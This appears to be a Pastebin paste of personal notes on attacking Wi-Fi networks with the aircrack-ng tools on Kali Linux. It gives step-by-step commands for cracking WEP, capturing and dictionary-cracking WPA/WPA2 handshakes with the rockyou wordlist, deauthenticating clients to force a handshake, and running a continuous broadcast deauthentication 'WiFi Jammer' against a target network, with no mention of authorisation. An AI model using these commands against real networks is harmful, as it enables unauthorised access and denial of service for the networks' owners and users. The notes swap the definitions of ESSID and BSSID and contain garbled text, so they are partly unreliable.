Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ===================
- CAPTURING WIRELESS COMMUNICATION PACKETS
- ==========================================
- Attacker’s Machine - Kali OS
- Device Used - Leoxsys External WIFI Adapter (LEO-HG150N)
- Tool - Airmon-ng , Airodump-ng (Non-Graphical)
- Modes of Using a Wireless Adapter :
- # Standard Mode : The mode which basically used by everyone to manage and use the services of a particular Access Point.
- # Monitoring Mode : The mode which allows a system with a wireless network interface controller to monitor all traffic received from the wireless network.
- Command: iwconfig --> to check which mode that wifi adapter is working on
- Tools we will be encountering are :
- * Airmon-ng : A tool which converts our wireless card into a promiscuous mode wireless card. Yes, that means that our wireless card will hookup with anyone !
- Well, that's almost correct. When our network card is in promiscuous mode, it means that it can ggtyttttttyyygsee and receive all network traffic. Generally, network cards will only receive packets intended for them (as determined by the MAC address of the NIC), but with airmon-ng, it will receive all wireless traffic intended for us or not.
- Commands:
- # iwconfig
- # airmon-ng start wlan0
- # kill PID (those which might create problem)
- * Airodump-ng : A tool which enables us to capture packets of our specification.This will show us some more information about a perticular wireless network. So lets discuss with some of the keywords.
- Commands:
- # airodump-ng wlan0mon
- #
- Terminologies
- ==============
- Beacons : Number of beacons sent by the AP. Each access point sends about ten beacons per second at the lowest rate (1M), so they can usually be picked up from very far.
- #Data : Number of captured data packets, including data broadcast packets.
- #s : Number of data packets per second measure over the last 10 seconds.
- CH : Channel number (taken from beacon packets). Note: sometimes packets from other channels are captured even if airodump-ng is not hopping, because of radio interference.
- MB : Maximum speed supported by the AP.
- ENC : Encryption algorithm in use. OPN = no encryption,"WEP?" = WEP or higher (not enough data to choose between WEP and WPA/WPA2), WEP (without the question mark) indicates static or dynamic WEP, and WPA or WPA2 if TKIP or CCMP or MGT is present.
- CIPHER : The cipher detected. One of CCMP, WRAP, TKIP, WEP, WEP40, or WEP104. Not mandatory, but TKIP is typically used with WPA and CCMP is typically used with WPA2.
- AUTH : The authentication protocol used. One of MGT (WPA/WPA2 using a separate authentication server), SKA (shared key for WEP), PSK (pre-shared key for WPA/WPA2).
- WPS : This is only displayed when --wps (or -W) is specified. If the AP supports WPS, the first field of the column indicates version supported.
- ESSID : THe MAC / Physical Address of the Access Point.
- BSSID : Name of the Access Point.
- WEP
- ===
- #iwconfig
- #airmon-ng
- #airmon-ng start wlan0
- #iwconfig
- #airodump-ng wlan0mon
- bssid channel number
- #airodump-ng --bssid <Target's BSSID> -c <Target's Channel Number> -w <File Name In Which I want To Capture the Beacons --> aranjit> wlan0mon
- Wait until the beacons number reaches to 25,000
- #aircrack-ng aranjit-01.cap
- WPA|WPA2
- ========
- When there is a new device connecting
- -------------------------------------
- #iwconfig
- #airmon-ng
- #airmon-ng start wlan0
- #iwconfig
- #airodump-ng wlan0mon
- bssid channel number
- #airodump-ng --bssid <Target's BSSID> -c <Target's Channel Number> -w <File Name In Which I want To Capture the Beacons --> aranjit> wlan0mon
- It will help you to get the WPA handshake
- #aircrack-ng -w /usr/share/wordlists/rockyou.txt aranjit-01.cap
- When there is no new device connecting
- -------------------------------------
- #iwconfig
- #airmon-ng
- #airmon-ng start wlan0
- #iwconfig
- #airodump-ng wlan0mon
- bssid channel number
- #airodump-ng --bssid <Target's BSSID> -c <Target's Channel Number> -w <File Name In Which I want To Capture the Beacons --> aranjit> wlan0mon
- It will help you to get the WPA handshake
- #aireplay-ng -0 10 -a <Router's BSSID> -s <Station's BSSID> wlan0mon
- This will make us capture the handshake
- #aircrack-ng -w /usr/share/wordlists/rockyou.txt aranjit-01.cap
- WiFi Jammer
- ===========
- #aireplay-ng -0 0 -a <Router's BSSID> -s FF:FF:FF:FF:FF:FF wlan0mon
Add Comment
Please, Sign In to add comment